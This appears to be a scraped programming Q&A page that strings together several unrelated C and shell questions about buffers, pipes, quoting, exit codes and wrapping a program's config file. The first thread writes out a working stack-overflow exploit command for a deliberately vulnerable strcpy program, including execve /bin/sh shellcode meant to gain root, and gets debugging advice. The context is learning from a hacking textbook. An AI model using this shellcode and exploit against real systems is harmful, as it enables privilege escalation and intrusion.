I am trying to do stack overflow using perl (of course get root privileges using normal user (using shellcode)). I am learning hacking with Jon Erickson's book and I would be really glad if you would help me a bit.
I am typing this command:
./vuln `perl -e 'print "\x90"x202'``cat shellcode``perl -e 'print "\x70\xcc\x81\xbe"x70;'`
vuln:
int main(int argc, char *argv[])
{
char buffer[500];
strcpy(buffer, argv[1]);
return 0;
}
shellcode:
\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80\xeb\x16\x5b\x31\xc0\x88\x43\x07\x89\x5b\x08\x89\x43\x0c\xb0\x0b\x8d\x4b\x08\x8d\x53\x0c\xcd\x80\xe8\xe5\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68
and I get "Segmentation fault". I know that I need to fill every ret adress but no matter what I do, when I am trying to paste more than 67 ESP (stack pointers) I get this error.
Try running the program under gdb and see where it crashes. One thing in particular to be careful of when combining cat file in your exploit is that it may append a new line \n byte and cause your shellcode to get out of alignment.
Related
I am new to C programming and i am really confused on below code:
#include <stdio.h>
#include <string.h>
int main(void)
{
char arrstr[6];
int i;
printf("Enter: ");
scanf("%s",arrstr);
printf("arrstr is %s\n",arrstr);
printf("length os arrstr is %d\n",strlen(arrstr));
for(i=0;i<20;i++)
{
printf("arrstr[%d] is %c, dec value is %d\n",i,arrstr[i],arrstr[i]);
}
return 0;
}
As from my understanding, after the declaration of arrstr[6], the compiler will allocate 6 bytes for this char array, and consider the last '\0' char, 5 valid chars can be stored in the char array.
But after i run this short code, i get below result:
The printf shows all chars i input, no matter how long is it. But when i using an index to check the array, seems i cannot find the extra chars in the array.
Can anyone helps to explain what happened?
Thanks.
Try changing your code by adding this line right after the scanf statement:
arrstr[5] = '\0';
What has happened is that the null character was overwritten by the user entry. Putting the null character back in manually gives you proper behavior for the next two lines, the printf statements.
The for loop is another matter. C does not have any kind of bounds checking so it's up to the programmer to not overrun the bounds of an array. The values you get after that could be anything at all, as you are just reading uninitialized RAM bytes at that point. A standard way of avoiding this is to use a const int variable to declare the array size:
const int SIZE = 6;
char arrstring[SIZE];
Then also use SIZE as the limit in the for loop.
P.S. There is still a problem here with the user entry as written, because a user could theoretically enter hundreds of characters, and that would get written out-of-bounds it seems, possibly causing weird bugs. There are ways to limit the amount of user entry, but it gets fairly involved, here are some stackoverflow posts on the topic. Keep in mind for future reference:
Limiting user entry with fgets instead of scanf
Cleaning up the stdin stream after using fgets
Why in the below code ,no output is being shown.When I comment the line : "close(pipefd1[0]);" ,then the code is working well,otherwise it's not printing even "checking" on the terminal.
#include<bits/stdc++.h>
using namespace std;
#include <stdlib.h>
#include <unistd.h>
int main(){
int pipefd1[2];
char buff[100]="hey there";
char be[100];
pipe(pipefd1);
close(pipefd1[0]);
cout<<"checking";
write(pipefd1[1],buff,100);
close(pipefd1[1]);
read(pipefd1[0],be,100);
close(pipefd1[0]);
cout<<be;
}
The problem, though, is that you are writing to a pipe without a reader. Per specification of POSIX write, when writing to a pipe with only one end open, an error should be raised:
[EPIPE]
An attempt is made to write to a pipe or FIFO that is not open for reading by any process, or that only has one end open. A SIGPIPE signal shall also be sent to the thread.
This error causes your program to terminate directly, which prevents the executing of the remaining code.
Since writing ot the standard output is most times buffered, the program does not have the time to flush the output, which made it looking as if the line with cout << "checking"; was not executed. If you would have written std::cout.flush(); after writing 'checking' to the output, you would have seen it on your terminal.
I'm wondering if there is some pattern or trick to remember when or when not to use quotes in command line arguments.
e.g. what is the difference between:
find -type f -name "*<extension-with-quotes>"
and
cp <extension-without-quotes> ../<new-folder>
One needs quotes and one does not, else it gives an error. Why?
You need quotes if you don't want the shell expanding the arguments, but instead want the argument passed through verbatim to whatever program you're trying to run. See, for example, the following program:
#include <stdio.h>
int main (int argc, char *argv[]) {
printf ("Argument count = %d\n", argc);
for (int i = 0; i < argc; i++)
printf (" %2d: [%s]\n", i, argv[i]);
return 0;
}
which outputs its argument count and arguments. The following transcript shows how it runs with and without quotes:
$ ./testprog "*.sh"
Argument count = 2
0: [./testprog]
1: [*.sh]
$ ./testprog *.sh
Argument count = 7
0: [./testprog]
1: [xmit.sh]
2: [gen.sh]
3: [morph.sh]
4: [prog.sh]
5: [mon.sh]
6: [test.sh]
So, for example, if you're in a directory with three log files, the shell will change your:
ls *.log
into:
ls a.log b.log c.log
before handing that list on to the ls program (the ls program will never see the *.log at all).
However, find expects a file pattern rather than a list of files, so it will want the *.log passed through as is, one single argument rather than three individual arguments expanded by the shell.
In fact, if you had only a.log in the current directory, an unquoted *.log would only find files called a.log regardless of how many other log files existed in the directories below. That's because find never saw the *.log, only the a.log that the shell expanded it to.
A similar example is with expr. If you want to know what three times seven is, you don't want to be doing:
expr 3 * 7
since the shell will first expand * into all the files in the current directory:
3 dallas_buyers_club.avi nsa_agent_list.txt whitehouse_bomb.odt 7
and expr won't be able to make much sense of that1. The correct way of doing it is along the lines of:
expr 3 '*' 7
in effect preserving the * so the program gets it unchanged.
1 Special note to the NSA, CIA, MPAA and other dark shadowy organisations formed to strike fear into the hearts of mortal men. That file list is fictional humour. I really don't want any men in dark suits showing up at my front door :-)
I'm trying to run a program with perl to print "A" 512 times through gdb. It returned with code 04. I started slowly going down to 511 then 510 and so on. But it still returned with code 04. Is this how it's supposed to be? If not, what am I doing wrong? Thanks for your answers.
Code:
#include <stdio.h>
int main(int argc, char * argv[])
{
char buf[256];
if(argc == 1)
{
printf("Usage: %s input\n", argv[0]);
exit(0);
}
strcpy(buf,argv[1]);
printf("%s", buf);
}
And I'm running from gdb:
run perl -e 'print "A" x 512'
There's no reason to involve either perl or gdb for this.
As of the 1989/1990 C standard, reaching the } at the end of main returns an undefined status to the environment. (The actual status of 4 in your case is probably the value returned by printf, which is the number of characters it printed. The way you invoked the program, argv[0] points to the string "perl", which is 4 characters long. But you absolutely should not count on that behavior.)
The 1999 standard introduced a new rule (inspired by C++): reaching the end of main does the equivalent of return 0;. But gcc by default uses the C90 standard plus GNU extensions (equivalent to -std=gnu90).
Add a return 0; to the end of your main function and/or compile your C program with an option that specifies a later standard, such as -std=c99 (or -std=gnu99 if you want to use GNU-specific extensions).
Finally, it looks like you were trying to print 512 'A' characters, but you were invoking your program with the arguments:
perl -e 'print "A" x 512'
That's three arguments, and your program ignores all but the first, the 4-character string "perl". The remaining arguments were meant to be passed to the Perl interpreter, but you didn't invoke the Perl interpreter.
One correct way to do this would be:
./foo $(perl -e 'print "A" x 512')
where foo is the name of your program. But that would cause undefined behavior (possibly a program crash, or it might appear to "work" if you're unlucky), because you copy the string pointed to by argv[1] into an array of only 256 characters. For this simple program, that's easily avoided by not copying the string.
And your program's output doesn't end with a newline, which can cause problems. On a UNIX-like system, the program's output will likely be printed on the same line as your next shell prompt -- or the output might not be visible at all.
To see the program's exit status, type:
echo $?
(This assumes you're using bash or a similar shell.)
i have a command line executable program that accepts a configuration file as it's one argument for launch. the configuration file contains only 2 lines of code:
#ConfigFile.cfg
name=geoffrey
city=montreal
currently, the wrapper program that i'm building for this command line executable program writes the configuration file to disk and than sends that written file as the argument to launch the program on the command line.
> myProgram.exe configFile.cfg
is it possible to cast these configuration file entries as the configuration file, allowing me to bypass having to write the configuration file to disk but still allow the program to run as if it's reading from a configuration file?
perhaps something like the following:
> myProgram.exe configFile.cfg(name=geoffrey) configFile.cfg(city=montreal)
If you don't control the source for the program you're wrapping, and it doesn't already provide a facility to receive input in another way, you're going to find it difficult at best.
One possibility would be to intercept the file open and access calls used by the program though this is a horrible way to do it.
It would probably involve injecting your own runtime libraries containing (for C) fopen, fclose, fread and so on, between the program and the real libraries (such as using LD_LIBRARY_PATH or something similar), and that's assuming it's not statically linked. Not something for the faint of heart.
If you're worried about people being able to see your file, there's plenty of ways to avoid that, such as by creating it with rwx------ permissions in a similarly protected directory (assuming UNIX-like OS). That's probably safer than using command line arguments which any joker logged in could find out with a ps command.
If you just don't want the hassle of creating a file, I think you'll find the hassle of avoiding it is going to be so much more.
Depending on what you're really after, it wouldn't take much to put together a program that accepted arguments, wrote them to a temporary file, called the real program with that temporary file name, then deleted the file.
It would still be being written to disk, but that would no longer be the responsibility of your wrapper program. Something along the lines of (a bit rough, but you should get the idea):
#include <stdio.h>
#define PROG "myProgram"
int main (int argCount, char *argVal[]) {
char *tmpFSpec;
FILE *fHndl;
int i;
char *cmdBuff;
tmpFSpec = getTempFSpec(); // need to provide this.
cmdBuff = malloc (sizeof(PROG) + 1 + strlen (tmpFSpec) + 1);
if (cmdBuff == NULL) {
// handle error.
return 1;
}
fHndl = fopen (tmpFSpec, "w");
if (fHndl == NULL) {
// handle error.
free (cmdBuff);
return 1;
}
for (i = 1; i < argCount; i++)
fprintf (fHndl, "%s\n", argVal[i]);
sprintf (cmdBuff, "%s %s", PROG, tmpFSpec);
system (cmdBuff);
return 0;
}